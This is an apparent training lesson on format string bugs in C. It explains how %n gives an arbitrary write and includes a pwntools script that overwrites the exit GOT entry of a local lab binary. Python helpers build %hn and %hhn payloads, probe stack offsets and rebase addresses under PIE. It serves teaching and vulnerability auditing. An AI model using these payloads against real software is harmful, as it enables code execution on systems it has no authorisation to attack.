Format String Arbitrary Write: Exploiting %n for GOT Overwrite and Code Redirection

binary_exploitation Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Format string vulnerabilities have been weaponised in critical production software for decades. The Wu-FTPd 2.6.0 vulnerability (CVE-2000-0573) allowed unauthenticated remote code execution by passing a format string through the SITE EXEC command, giving attackers root on affected servers. Microsoft's Windows Print Spooler and numerous embedded firmware images have carried the same class of bug. NICE framework knowledge statements K0168 (knowledge of exploit code and how it works) and K0169 (knowledge of reverse engineering concepts) are directly exercised when analysing these bugs, and task T0028 (conduct vulnerability assessments) names format string testing as a required capability. Any binary analyst must understand how %n turns a logging call into an arbitrary write primitive.

Core Concept

A format string vulnerability occurs when user-controlled data is passed directly as the format argument to a variadic function such as printf, fprintf, or sprintf — for example printf(user_input) instead of the safe printf("%s", user_input). The C standard defines %n as a conversion specifier that writes the number of characters printed so far into the int * argument at the corresponding position in the variadic argument list. Because the format string controls both the number of characters printed and which stack slot is treated as a pointer, an attacker can aim %n at any writable address.

The write primitive works in three steps. First, the attacker arranges for the target address to sit on the stack, typically by embedding it in the format string buffer, which itself lives on the stack and is therefore reachable as a positional argument. Second, the attacker uses padding specifiers such as %<N>c to print exactly as many characters as the value to be written. Third, %<pos>$n writes that count to the address held in argument number <pos>, counting from the first argument after the format string. Four-byte writes use %n; two-byte writes use %hn; one-byte writes use %hhn.
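The three steps can be sketched by hand for a single two-byte write. This is a minimal illustration, not a general payload builder: the function name single_hn_write is hypothetical, the target is assumed to be 32-bit little-endian, the first four bytes of the buffer are assumed to be read as argument number offset, and the address is assumed to be usable at the start of the payload.

```python
import struct

def single_hn_write(offset: int, addr: int, value: int) -> bytes:
    """Build a payload that stores the 16-bit `value` at `addr` with %hn.

    Assumptions (hypothetical setup): 32-bit little-endian target, and the
    first 4 bytes of the buffer are read as argument number `offset`.
    """
    if not 0 <= value <= 0xFFFF:
        raise ValueError("value must fit in 16 bits")

    # Step 1: put the target address on the stack via the buffer itself.
    packed = struct.pack("<I", addr)
    if any(b in packed for b in (0x00, 0x0A, ord("%"))):
        raise ValueError("address contains a byte that breaks the payload")

    # Step 2: print enough characters for the running count to equal `value`.
    # The 4 address bytes are already printed; %hn keeps only the low 16 bits,
    # so the count may wrap around modulo 0x10000.
    pad = (value - len(packed)) % 0x10000
    padding = f"%{pad}c".encode() if pad else b""

    # Step 3: write the count through the pointer at position `offset`.
    return packed + padding + f"%{offset}$hn".encode()

print(single_hn_write(6, 0x0804A010, 0xBEEF))
```

With these inputs the padding is 0xbeef minus the 4 address bytes already printed, that is 48875 characters. A full 32-bit value would need a second %hn write aimed at addr + 2.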

Common write targets are the Global Offset Table (GOT), which holds the resolved addresses of imported library functions and sits at a fixed, known address when the binary is not position-independent (PIE disabled), and function pointers stored in writable data such as __malloc_hook and __free_hook (both removed in glibc 2.34) or application-level dispatch tables. Overwriting the GOT entry of a function that is called after the vulnerable printf, such as exit or puts, with the address of a one-gadget or system yields code execution the next time that function is called.

Technical Deep-Dive

// Vulnerable program pattern
#include <stdio.h>
int main(int argc, char *argv[]) {
    char buf[256];
    fgets(buf, sizeof(buf), stdin);
    printf(buf);          // BUG: user controls format string
    return 0;
}

The stack layout at the printf call looks like (x86-32, simplified):

[esp+0]    -> ptr to buf        (format string argument)
[esp+4]    -> 1st variadic slot (position %1$...)
[esp+8]    -> 2nd variadic slot (position %2$...)
...
[esp+4*K]  -> buf[0..3]         (position %K$...; holds target_addr when the payload embeds it here)

An attacker who finds the buffer at offset 6 on the stack can overwrite the GOT entry for exit with the address of a win function, assuming the target binary defines win and calls exit after the vulnerable printf:

from pwn import *

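elf    = context.binary = ELF('./vuln')   # also sets arch and endianness for fmtstr_payload
target = elf.got['exit']          # address to overwrite (binary must import exit)
value  = elf.sym['win']           # value to write there (binary must define win)

# fmtstr_payload(offset, {addr: value}) builds the payload automatically;
# 6 is the buffer's stack offset, found beforehand with a %p probe
payload = fmtstr_payload(6, {target: value})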

p = process('./vuln')
p.sendline(payload)
p.interactive()

fmtstr_payload handles the arithmetic: it calculates how many characters must be printed before each write, inserts the correct %<N>c padding, and places the target addresses in the payload so that the positional specifiers reach them. By default it writes one byte at a time with %hhn, which keeps the padding small; its write_size parameter ('byte', 'short', or 'int') selects %hhn, %hn, or %n writes respectively. Full 4-byte %n writes are rarely practical because they can require printing billions of characters.
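The padding arithmetic for byte-sized writes can be sketched as follows. This is a naive illustration that writes the bytes in address order; it is not how pwntools orders or merges its writes internally, and the function name hhn_padding_plan and the example value 0x08049196 are hypothetical.

```python
def hhn_padding_plan(value: int, printed: int = 0, width: int = 4):
    """Return (byte_index, byte_value, padding) for each %hhn write.

    `printed` is the number of characters already output before the first
    padding specifier. %hhn stores only the low 8 bits of the running count,
    so each padding is computed modulo 256.
    """
    plan = []
    for i in range(width):
        byte = (value >> (8 * i)) & 0xFF      # little-endian: lowest byte first
        pad = (byte - printed) % 256          # extra characters needed
        plan.append((i, byte, pad))
        printed += pad                        # the count never decreases
    return plan

for index, byte, pad in hhn_padding_plan(0x08049196):
    print(f"addr+{index}: want 0x{byte:02x}, print {pad} more characters")
```

A padding of 0 means the %<N>c specifier is omitted for that write, because %0c would still print one character.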

Reverse Engineering Methodology

When auditing a binary for format string bugs:
1. Locate all calls to variadic format functions: printf, fprintf, sprintf, snprintf, syslog, err, warn.
2. For each call, check whether the format argument is a string literal or a pointer to user-controlled memory. In IDA/Ghidra look for mov [esp], eax where eax holds a user buffer, rather than mov [esp], offset .rodata:fmt_str.
3. Confirm writability of the target section (checksec --file=./vuln shows RELRO: No RELRO or Partial RELRO).
4. Use %p chains to leak the stack and identify the buffer's offset before crafting the write.
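The %p probing step can be sketched with two small helpers. This is an illustrative sketch for a 32-bit little-endian target: the helper names build_probe and find_offset are hypothetical, and the sample output below is made up for demonstration rather than captured from a real run.

```python
def build_probe(max_pos: int = 20, marker: bytes = b"AAAA") -> bytes:
    """Return a probe such as b'AAAA.%1$p.%2$p...' that dumps stack slots."""
    specs = ".".join(f"%{i}$p" for i in range(1, max_pos + 1))
    return marker + b"." + specs.encode()

def find_offset(output: bytes, marker: bytes = b"AAAA"):
    """Return the 1-based position whose leaked value equals the marker."""
    want = int.from_bytes(marker, "little")   # b'AAAA' -> 0x41414141
    fields = output.split(b".")[1:]           # drop the echoed marker itself
    for pos, field in enumerate(fields, start=1):
        text = field.decode("ascii", "replace").strip()
        try:
            leaked = int(text, 16)            # accepts the 0x prefix
        except ValueError:
            continue                          # e.g. "(nil)" printed for NULL
        if leaked == want:
            return pos
    return None

# Made-up sample of what the vulnerable program might echo back.
sample = b"AAAA.0x100.0xf7fb5580.(nil).0xffffd0a4.0x1.0x41414141.0x2431252e\n"
print(build_probe(3))
print(find_offset(sample))
```

Positions start at 1, matching %1$p, so the value returned here can be passed directly as the offset argument when building the write payload.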

Common Reversing Errors

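Off-by-one in offset counting: Positions start at 1, not 0; %1$p reads the first argument after the format string. Use %1$p, %2$p, … and compare the output to the buffer's content to locate its offset precisely.
Printing too many characters: A single 4-byte %n write of a value such as 0x0804xxxx forces printf to emit over a hundred million characters, which is slow and may fail once the count exceeds what a signed 32-bit counter can hold. Split the write into two %hn half-word writes at addr and addr+2, performing the write with the smaller value first because the character count only increases (or let the count wrap modulo 0x10000).
Null bytes in address terminate the string: printf stops parsing the format at the first null byte. On 64-bit targets this is the norm, because user-space addresses have zero upper bytes; on 32-bit targets it occurs only when an address happens to contain a 0x00 byte, for example 0x0804a000. Place addresses at the end of the payload, after all conversion specifiers, and adjust the positional offsets to match.
ASLR with PIE defeats static GOT addresses: Leak a code pointer with %p first, subtract its static offset to obtain leaked_base, then compute the GOT address as leaked_base + static_offset before sending the write payload. This requires the vulnerable call to be reachable at least twice in the same process.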
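The leaked_base + static_offset computation can be sketched as below. The function name rebase_got and all addresses and offsets are hypothetical, chosen only to make the arithmetic concrete; in practice the static offsets come from the binary's symbol table or a disassembler.

```python
def rebase_got(leaked_addr: int, leaked_static_offset: int,
               got_static_offset: int) -> int:
    """Turn a leaked runtime pointer into the runtime address of a GOT entry.

    leaked_addr          -- pointer into the binary recovered via %p
    leaked_static_offset -- offset of that same location in the file
    got_static_offset    -- offset of the GOT entry in the file
    """
    leaked_base = leaked_addr - leaked_static_offset
    # A load base is page-aligned; anything else suggests the wrong leak.
    if leaked_base & 0xFFF:
        raise ValueError("computed base is not page-aligned")
    return leaked_base + got_static_offset

# Hypothetical numbers: a return address at file offset 0x11e9 leaked as
# 0x565561e9, and a GOT entry at file offset 0x4010.
print(hex(rebase_got(0x565561E9, 0x11E9, 0x4010)))
```

The page-alignment check is a cheap sanity test: a misidentified leak usually produces a base that is not a multiple of 0x1000.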
